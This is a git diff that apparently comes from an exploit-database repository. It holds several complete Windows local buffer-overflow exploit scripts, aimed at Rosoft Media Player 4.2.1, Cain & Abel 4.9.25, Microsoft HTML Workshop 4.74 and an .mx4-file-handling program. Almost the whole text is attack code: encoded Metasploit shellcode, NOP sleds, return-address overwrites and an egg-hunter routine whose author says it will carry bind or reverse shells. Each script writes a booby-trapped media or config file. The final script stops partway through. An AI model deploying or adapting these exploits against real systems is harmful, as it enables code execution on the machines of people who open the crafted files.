+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5F\x73\x79\x6E\x74\x68\x2E\x70\x6E\x67\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF".
+	        "\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00\x45\x66\x78\x4C\x4C\x49\x53\x54\xDC\x00\x00\x00\x45\x69".
+	        "\x73\x4C\x45\x66\x78\x44\xD0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x4D\x47\x63\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x01\x00\x00\x00\x44\x58\x46\x58\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7F\x00\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00".
+	        "\x00\x00\x45\x69\x66\x78";
+
+# win32_exec -  EXITFUNC=thread CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $shellcode =
+"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x53".
+"\x9f\x26\xea\x83\xeb\xfc\xe2\xf4\xaf\x77\x62\xea\x53\x9f\xad\xaf".
+"\x6f\x14\x5a\xef\x2b\x9e\xc9\x61\x1c\x87\xad\xb5\x73\x9e\xcd\xa3".
+"\xd8\xab\xad\xeb\xbd\xae\xe6\x73\xff\x1b\xe6\x9e\x54\x5e\xec\xe7".
+"\x52\x5d\xcd\x1e\x68\xcb\x02\xee\x26\x7a\xad\xb5\x77\x9e\xcd\x8c".
+"\xd8\x93\x6d\x61\x0c\x83\x27\x01\xd8\x83\xad\xeb\xb8\x16\x7a\xce".
+"\x57\x5c\x17\x2a\x37\x14\x66\xda\xd6\x5f\x5e\xe6\xd8\xdf\x2a\x61".
+"\x23\x83\x8b\x61\x3b\x97\xcd\xe3\xd8\x1f\x96\xea\x53\x9f\xad\x82".
+"\x6f\xc0\x17\x1c\x33\xc9\xaf\x12\xd0\x5f\x5d\xba\x3b\x70\xe8\x0a".
+"\x33\xf7\xbe\x14\xd9\x91\x71\x15\xb4\xfc\x47\x86\x30\x9f\x26\xea";
+
+my $overflow1 = "\x41" x 316;
+my $overflow2 = "\x41" x 1024;
+my $short_jmp = "\xeb\x06\xff\xff";
+my $ret = "\xf9\x2b\x03\x10"; #universal return address = 0x10032bf9 acuutils.dll
+my $nop_sled = "\x90" x 24;
+
+open(my $mx4_file, "> s.mx4");
+binmode $mx4_file;
+print $mx4_file $mx4_data1.
+		$overflow1.$short_jmp.$ret.$nop_sled.$shellcode.$overflow2.
+                $mx4_data2;
+close($mx4_file);
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/windows/local/7684.pl b/platforms/windows/local/7684.pl
index 539d10c5c..63d71dd2c 100755
--- a/platforms/windows/local/7684.pl
+++ b/platforms/windows/local/7684.pl
@@ -1,41 +1,41 @@
-# Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit(0-day)
-# By:Encrypt3d.M!nd
-#
-# Well,There is a buffer overflow in the program were all the supported types are
-# Affected(m3u,rml,txt),Also Rosoft Media Player treat all the other types as txt so all
-# the types are affected :),and also all the versions are affected
-#
-# Greetz:-=Mizo=-,L!ON,El Mariachi,MiNi SpIder,and all my friends
-# I'm Iraqian...Not Arabian
-
-
-
-# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com 
-shellcode = (
-"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
-"\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e"
-"\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12"
-"\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56"
-"\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d"
-"\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f"
-"\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0"
-"\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33"
-"\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f"
-"\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23"
-"\xcc\x21\xdb\x5b")
-
-File = 'encrypt3d.m3u' # change it with what ever you like
-
-eip = "\x6B\x8C\x49\x7E" # Windows XP SP3:user32.dll
-
-chars = "A"*4096
-
-addr = "\xF0\xFF\xFD\x7F" # Writeable address contains 0,NOT 0x00
-
-#addr = "\xE0\x0F\x70\x12" # if the address above not workin try this one
-
-file=open(File,'w')
-file.write(chars+addr+"\x90"*4+eip+"\x90"*10+shellcode)
-file.close()
-
-# milw0rm.com [2009-01-06]
+# Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit(0-day)
+# By:Encrypt3d.M!nd
+#
+# Well,There is a buffer overflow in the program were all the supported types are
+# Affected(m3u,rml,txt),Also Rosoft Media Player treat all the other types as txt so all
+# the types are affected :),and also all the versions are affected
+#
+# Greetz:-=Mizo=-,L!ON,El Mariachi,MiNi SpIder,and all my friends
+# I'm Iraqian...Not Arabian
+
+
+
+# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com 
+shellcode = (
+"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
+"\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e"
+"\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12"
+"\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56"
+"\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d"
+"\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f"
+"\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0"
+"\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33"
+"\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f"
+"\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23"
+"\xcc\x21\xdb\x5b")
+
+File = 'encrypt3d.m3u' # change it with what ever you like
+
+eip = "\x6B\x8C\x49\x7E" # Windows XP SP3:user32.dll
+
+chars = "A"*4096
+
+addr = "\xF0\xFF\xFD\x7F" # Writeable address contains 0,NOT 0x00
+
+#addr = "\xE0\x0F\x70\x12" # if the address above not workin try this one
+
+file=open(File,'w')
+file.write(chars+addr+"\x90"*4+eip+"\x90"*10+shellcode)
+file.close()
+
+# milw0rm.com [2009-01-06]
diff --git a/platforms/windows/local/7688.pl b/platforms/windows/local/7688.pl
index 9f8d5683a..50cd135e0 100755
--- a/platforms/windows/local/7688.pl
+++ b/platforms/windows/local/7688.pl
@@ -1,50 +1,50 @@
-#!perl -w
-# Simple overflow for Cain & Abel v4.9.25 (and below?)
-# This script will output a file; import this file as a 
-# config file under Cracker -> Cisco IOS-MD5 Hashes
-#
-# If Cain crashes but calc.exe isn't run, change $eip to reflect
-# your system.
-#
-# send9 /at/ chiseclabs.com
-
-use strict;
-
-my $eip = "\xD8\x69\x83\x7C"; # 0x7C8369D8 - kernel32.dll, call esp (WinXP SP2)
-my $nop = "\x90" x 4;
-my $pad = "A" x 100;
-
-# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54".
-"\x42\x50\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x53\x4b\x58\x4e\x57".
-"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
-"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x48".
-"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
-"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x54".
-"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x38".
-"\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x32\x46\x30\x43\x4c\x41\x43".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x38\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b".
-"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33".
-"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x47".
-"\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x49".
-"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36".
-"\x4e\x46\x43\x46\x50\x32\x45\x56\x4a\x37\x45\x56\x42\x30\x5a";
-
-my $b00m = $pad . $eip . $nop . $shellcode;
-
-open(BOF,">cain_ios_ex.conf") or die "Error: Can't open a file for writing\n";
-print BOF $b00m;
-close(BOF);
-
-print "Now just open cain_ios_ex.conf as a configuration file under Cracker -> Cisco IOS-MD5 Hashes.\n";
-
-# milw0rm.com [2009-01-07]
+#!perl -w
+# Simple overflow for Cain & Abel v4.9.25 (and below?)
+# This script will output a file; import this file as a 
+# config file under Cracker -> Cisco IOS-MD5 Hashes
+#
+# If Cain crashes but calc.exe isn't run, change $eip to reflect
+# your system.
+#
+# send9 /at/ chiseclabs.com
+
+use strict;
+
+my $eip = "\xD8\x69\x83\x7C"; # 0x7C8369D8 - kernel32.dll, call esp (WinXP SP2)
+my $nop = "\x90" x 4;
+my $pad = "A" x 100;
+
+# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54".
+"\x42\x50\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x53\x4b\x58\x4e\x57".
+"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
+"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x48".
+"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
+"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x54".
+"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x38".
+"\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x32\x46\x30\x43\x4c\x41\x43".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x38\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b".
+"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33".
+"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x47".
+"\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x49".
+"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36".
+"\x4e\x46\x43\x46\x50\x32\x45\x56\x4a\x37\x45\x56\x42\x30\x5a";
+
+my $b00m = $pad . $eip . $nop . $shellcode;
+
+open(BOF,">cain_ios_ex.conf") or die "Error: Can't open a file for writing\n";
+print BOF $b00m;
+close(BOF);
+
+print "Now just open cain_ios_ex.conf as a configuration file under Cracker -> Cisco IOS-MD5 Hashes.\n";
+
+# milw0rm.com [2009-01-07]
diff --git a/platforms/windows/local/7727.pl b/platforms/windows/local/7727.pl
index 9f1ddad29..de37c4398 100755
--- a/platforms/windows/local/7727.pl
+++ b/platforms/windows/local/7727.pl
@@ -1,181 +1,181 @@
-#!/usr/bin/perl
-# Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
-# -----------------------------------------------------------------
-# Discovered/Exploit by SkD                    (skdrat@hotmail.com)
-# -----------------------------------------------------------------
-#
-# This is a continuation of my new method, shellhunting.
-# The exploit is far more advanced than the Amaya's as it runs on
-# every system, partly because the shellhunter itself is very much
-# reliable and universal.
-# The shellhunter does the following tasks to find and exec.
-# shellcode:-
-#
-# 1- Searches through the whole memory of the application.
-# 2- Installs a SEH handler so on access violations it won't
-#    stop hunting for the shellcode.
-# 3- Repairs stack so a stack overflow won't occur (that is what
-#    happens when the SEH is called up, many PUSH instructions
-#    are called from the relevant modules (ntdll, etc).
-# 4- Improved speed by searching through 32 bytes at a time.
-# 5- Uses a certain address in memory to store a variable for the
-#    search.
-#
-# It is very stable and will allow any shellcode (bind/reverse shell,
-# dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
-#
-# Yeah, I guess that's about it. Took me a few hours to figure out the
-# whole thing but nothing is impossible ;).
-#
-# Oh, I think some schools use this software :) (it's Microsoft's, right?).
-#
-# You can download the app. from Microsoft's official page:
-# ->  http://msdn.microsoft.com/en-us/library/ms669985.aspx
-#
-# If you are interested in my method and want to learn something new or
-# improve your exploitation skills then visit my team's blog at:
-# ->  http://abysssec.com
-#
-# Peace out,
-# SkD.
-
-
-
-my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
-	        "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
-                "\x6E\x74\x73\x20\x66\x69\x6C\x65".
-                "\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
-	        "\x78\x20\x66\x69\x6C\x65\x3D";
-my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
-		"\x0A\x61\x2E\x68\x74\x6D";
-my $crlf      = "\x0d\x0a";
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
-"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x46".
-"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x56\x42\x32\x42\x41\x41\x32".
-"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x58\x69\x69\x6c\x4b".
-"\x58\x62\x64\x65\x50\x67\x70\x47\x70\x6c\x4b\x42\x65\x45\x6c\x6e".
-"\x6b\x73\x4c\x53\x35\x73\x48\x45\x51\x4a\x4f\x6c\x4b\x70\x4f\x52".
-"\x38\x4c\x4b\x33\x6f\x55\x70\x57\x71\x6a\x4b\x61\x59\x4c\x4b\x36".
-"\x54\x6e\x6b\x53\x31\x48\x6e\x55\x61\x39\x50\x4d\x49\x4c\x6c\x4d".
-"\x54\x6b\x70\x74\x34\x66\x67\x4b\x71\x78\x4a\x56\x6d\x67\x71\x39".
-"\x52\x48\x6b\x4c\x34\x35\x6b\x62\x74\x56\x44\x57\x74\x54\x35\x6b".
-"\x55\x4e\x6b\x31\x4f\x65\x74\x67\x71\x5a\x4b\x50\x66\x6c\x4b\x56".
-"\x6c\x42\x6b\x6e\x6b\x53\x6f\x47\x6c\x67\x71\x7a\x4b\x6c\x4b\x45".
-"\x4c\x6c\x4b\x47\x71\x48\x6b\x4f\x79\x33\x6c\x44\x64\x73\x34\x49".
-"\x53\x70\x31\x6b\x70\x71\x74\x4e\x6b\x73\x70\x56\x50\x4b\x35\x49".
-"\x50\x62\x58\x66\x6c\x4c\x4b\x43\x70\x56\x6c\x4c\x4b\x50\x70\x45".
-"\x4c\x4c\x6d\x6c\x4b\x35\x38\x77\x78\x78\x6b\x67\x79\x4e\x6b\x6b".
-"\x30\x6c\x70\x57\x70\x63\x30\x33\x30\x4c\x4b\x32\x48\x67\x4c\x73".
-"\x6f\x35\x61\x48\x76\x71\x70\x56\x36\x6c\x49\x4a\x58\x6e\x63\x69".
-"\x50\x41\x6b\x56\x30\x65\x38\x6c\x30\x6f\x7a\x75\x54\x73\x6f\x31".
-"\x78\x4e\x78\x79\x6e\x6f\x7a\x36\x6e\x66\x37\x6b\x4f\x5a\x47\x52".
-"\x43\x65\x31\x30\x6c\x70\x63\x45\x50\x46";
-
-
-#/----------------Advanced Shellhunter Code----------------\
-#01D717DD   EB 1E            JMP SHORT 01D717FD            |
-#01D717DF   83C4 64          ADD ESP,64                    |
-#01D717E2   83C4 64          ADD ESP,64                    |
-#01D717E5   83C4 64          ADD ESP,64                    |
-#01D717E8   83C4 64          ADD ESP,64                    |
-#01D717EB   83C4 64          ADD ESP,64                    |
-#01D717EE   83C4 64          ADD ESP,64                    |
-#01D717F1   83C4 64          ADD ESP,64                    |
-#01D717F4   83C4 64          ADD ESP,64                    |
-#01D717F7   83C4 64          ADD ESP,64                    |
-#01D717FA   83C4 54          ADD ESP,54                    |
-#01D717FD   33FF             XOR EDI,EDI                   |
-#01D717FF   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
-#01D71804   8B3A             MOV EDI,DWORD PTR DS:[EDX]    |
-#01D71806   EB 0E            JMP SHORT 01D71816            |
-#01D71808   58               POP EAX                       |
-#01D71809   83E8 3C          SUB EAX,3C                    |
-#01D7180C   50               PUSH EAX                      |
-#01D7180D   6A FF            PUSH -1                       |
-#01D7180F   33DB             XOR EBX,EBX                   |
-#01D71811   64:8923          MOV DWORD PTR FS:[EBX],ESP    |
-#01D71814   EB 05            JMP SHORT 01D7181B            |
-#01D71816   E8 EDFFFFFF      CALL 01D71808                 |
-#01D7181B   B8 12121212      MOV EAX,12121212              |
-#01D71820   6BC0 02          IMUL EAX,EAX,2                |
-#01D71823   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
-#01D71828   83C7 20          ADD EDI,20                    |
-#01D7182B   893A             MOV DWORD PTR DS:[EDX],EDI    |
-#01D7182D   3907             CMP DWORD PTR DS:[EDI],EAX    |
-#01D7182F  ^75 F7            JNZ SHORT 01D71828            |
-#01D71831   83C7 04          ADD EDI,4                     |
-#01D71834   6BC0 02          IMUL EAX,EAX,2                |
-#01D71837   3907             CMP DWORD PTR DS:[EDI],EAX    |
-#01D71839  ^75 E0            JNZ SHORT 01D7181B            |
-#01D7183B   83C7 04          ADD EDI,4                     |
-#01D7183E   B8 42424242      MOV EAX,42424242              |
-#01D71843   3907             CMP DWORD PTR DS:[EDI],EAX    |
-#01D71845  ^75 D4            JNZ SHORT 01D7181B            |
-#01D71847   83C7 04          ADD EDI,4                     |
-#01D7184A   FFE7             JMP EDI                       |
-#\-----------------------End of Code----------------------/
-
-my $shellhunter = "\xeb\x1e".
-                  "\x83\xc4\x64".
-                  "\x83\xc4\x64".
-                  "\x83\xc4\x64".
-                  "\x83\xc4\x64".
-                  "\x83\xc4\x64".
-                  "\x83\xc4\x64".
-                  "\x83\xc4\x64".
-                  "\x83\xc4\x64".
-                  "\x83\xc4\x64".
-                  "\x83\xc4\x54".
-		  "\x33\xff".
-		  "\xba\xd0\xfa\xfd\x7f".
-                  "\x8b\x3a".
-                  "\xeb\x0e".
-                  "\x58".
-                  "\x83\xe8\x3c".
-                  "\x50".
-                  "\x6a\xff".
-                  "\x33\xdb".
-                  "\x64\x89\x23".
-                  "\xeb\x05".
-                  "\xe8\xed\xff\xff\xff".
-                  "\xb8\x12\x12\x12\x12".
-                  "\x6b\xc0\x02".
-                  "\xba\xd0\xfa\xfd\x7f".
-                  "\x83\xc7\x20".
-                  "\x89\x3a".
-                  "\x39\x07".
-                  "\x75\xf7".
-                  "\x83\xc7\x04".
-                  "\x6b\xc0\x02".
-                  "\x39\x07".
-                  "\x75\xe0".
-                  "\x83\xc7\x04".
-                  "\xb8\x42\x42\x42\x42".
-                  "\x39\x07".
-                  "\x75\xd4".
-                  "\x83\xc7\x04".
-                  "\xff\xe7";
-my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64;
-my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64;
-my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64;
-my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64;
-my $len = 280 - (length($shellhunter) + 55);
-my $overflow1 = "\x41" x $len;
-my $overflow2 = "\x41" x 55;
-my $overflow3 = "\x42" x 256;
